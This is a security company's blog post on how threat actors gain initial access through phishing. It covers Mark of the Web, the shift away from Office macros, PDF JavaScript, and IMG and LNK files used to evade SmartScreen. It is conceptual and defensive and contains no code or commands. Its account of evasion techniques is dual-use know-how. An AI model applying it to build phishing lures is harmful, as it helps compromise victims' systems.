• Who We Are
  • Our Solution
  • Our Services
  • Memberships and Partners
  • Contact Us
BITM, May 1 2023

Phishing for Initial Access (Threat Actor Style)


Initial Access consists of techniques that use vectors to gain an initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like enumerating valid accounts and internal hosts on the network.

Adversaries may send phishing messages to gain access to victim systems. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary, and they may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.

A spearphishing attachment is a specific variant of spearphishing. These attachments are different from other forms of spearphishing in that it employs the use of malware attached to an email and usually rely upon users’ interaction to gain execution.

What is MOTW?

The Mark of the Web (MOTW) feature was first introduced in Windows Vista, which was released in January 2007. It has been included in all subsequent versions of the Windows operating system, including Windows 7, Windows 8, Windows 8.1, and Windows 10/11.

MOTW is an important security feature that helps protect users from malicious code and other types of security threats that can result from running untrusted files. By using MOTW, users can run code from untrusted sources while still maintaining a high level of security, as Windows will restrict the code's privileges and limit its ability to interact with other parts of the system unless the user explicitly confirms that they trust the code.

Macros before and after the announcement from Microsoft

In February 2022, Microsoft announced that they will be blocking XL4 and VBA macros by default for all Office users. Proofpoint [link to article] observed that the use of these methods had seen a decrease of approximately 66%.

This change led to threat actors shifting their initial access techniques to container files like ZIP and ISO files. Other types of techniques observed were download-links to malicious files, inside documents such as PDF’s and some Microsoft Office applications.

A quick overview of some techniques being used by Threat Actor groups to bypass the security measures are discussed below:

Downloadable links in files

Links in documents pointing to malicious files can be a potential avenue for threat actors. These files can be downloaded from attacker-controlled infrastructure or popular services such as code repositories, centralized download management services, online storage, and application stores.

Embedded JS for PDF files

JavaScript (JS) is a scripting language commonly used in web development, but it can also be embedded in PDF documents. In some PDF programs, JS code can be executed when the document is opened, which allows for a wide range of functionality, including interactivity and multimedia features. However, because JS can also be used for malicious purposes, PDF readers often disable JS execution by default.

However, some users may enable JS execution to take advantage of certain features or functionality. This can also increase the risk of malicious actors using JS code to carry out attacks, such as delivering malware or stealing sensitive data. Additionally, attackers can use social engineering tactics to trick users into enabling JS execution in order to carry out their attacks.

Using containers to deliver malware

On the other hand, techniques becoming more common and complex are those that make use of container file types to strip the MOTW security features and put users at risk of being compromised.

When an executable file is tagged with the MOTW (Mark of the Web), Windows Defender SmartScreen will check if it is on an allowlist of well-known executables. If it is not on the allowlist, SmartScreen will prevent the file from being executed and display a warning to the user.

However, when container files are downloaded from the Internet and marked with the MOTW, the files contained within may not inherit the MOTW after the container files are extracted and/or mounted. This is because the MOTW is a feature of the NTFS file system and many container files do not support NTFS alternative data streams. Once a container file is extracted and/or mounted, the files within it may be treated as local files on disk and run without the protections provided by the MOTW.

Attackers use IMG files to deliver malicious payloads to their victims. They embed the executable files inside an IMG file and then attached it to a phishing email sent to the victim.

IMG files are disk image files commonly used to distribute software or operating systems. Attackers use IMG files as a delivery mechanism to bypass some security controls that are designed to block executable files. When the victim opens the IMG file, the embedded executable is executed on their system, allowing the attackers access to the compromised system to further perform their activities.

LNK files, or Windows shortcut files, are used to provide a shortcut to a specific file or folder on a Windows system. Attackers are exploiting the fact that LNK files can execute code to deliver malware to their victims.

One common technique used by attackers is to craft spear-phishing emails that appear to be from legitimate sources, such as colleagues, customers, or business partners. The emails include an attachment in the form of a malicious LNK file. When the victim opens the LNK file, it executes code that downloads and installs malware on the victim's system.

The LNK file itself does not contain any malicious code. Instead, it contains a reference to a remote file, such as an executable or a script, which is downloaded and executed by the LNK file. This allows the attackers to bypass some of the security controls that organizations have in place to block executable files, as the LNK file itself is not an executable.

Once the malware is installed on the victim's system, it can carry out a variety of malicious activities, such as stealing sensitive data, downloading additional malware, or creating backdoors that allow the attacker to access the system remotely.


In conclusion, initial access techniques remain a serious threat to businesses, with threat actors constantly shifting their tactics to evade detection and gain access to their targets' systems. While the MOTW feature in Windows can provide some level of protection against malicious files, it is not foolproof and attackers are finding ways to bypass it, such as using container files like IMGs. Similarly, LNK files continue to be a popular choice for delivering malware, but threat actors are using tooling to create custom malicious files that can take various forms and are tailored to specific targets and scenarios.

To defend against these attacks, organizations need to implement a multi-layered approach that combines various security measures, including email and web filtering, endpoint protection, user education, and software patching. By doing so, they can reduce the risk of compromise and protect against attacks that use various types of malicious files, including those that exploit vulnerabilities or use social engineering tactics.

It is crucial for organizations to stay up-to-date on the latest threats and continuously adapt their security measures to stay ahead of attackers. By being vigilant and proactive, businesses can protect their systems and data from the potentially devastating effects of cyber attacks.

Thanks for reading and stay safe out there!

Author: G. Botha

Written by


Previous Open-source C2’s for Purple Teaming
Next Unleashing the Power of Capture the Flag Events in Cyber Security